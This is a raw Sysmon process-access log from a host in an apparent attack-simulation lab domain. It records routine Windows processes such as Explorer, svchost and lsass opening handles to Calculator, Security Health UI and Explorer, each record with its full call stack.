10341000x8000000000000000360390Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+29d90|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360389Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360388Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360387Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337b-6013-8402-000000001100}16565764C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14517|C:\Windows\System32\CapabilityAccessManagerClient.dll+141f0|C:\Windows\System32\CapabilityAccessManagerClient.dll+151b5|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360386Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e
10341000x8000000000000000360385Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337a-6013-7e02-000000001100}63045600C:\Windows\system32\ctfmon.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\MSCTF.dll+328e0|C:\Windows\System32\MSCTF.dll+31adc|C:\Windows\System32\MSCTF.dll+3176f|C:\Windows\System32\MSCTF.dll+315d2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360384Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360383Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16565764C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14387|C:\Windows\System32\CapabilityAccessManagerClient.dll+15172|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360382Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360381Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e
10341000x8000000000000000360380Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9
10341000x8000000000000000360379Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16561804C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360378Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360377Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360376Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e
10341000x8000000000000000360375Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360374Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360373Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+374d7|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360372Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-337b-6013-8402-000000001100}16566216C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360371Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37271|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360370Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16562912C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360369Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2aff6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360368Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360367Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM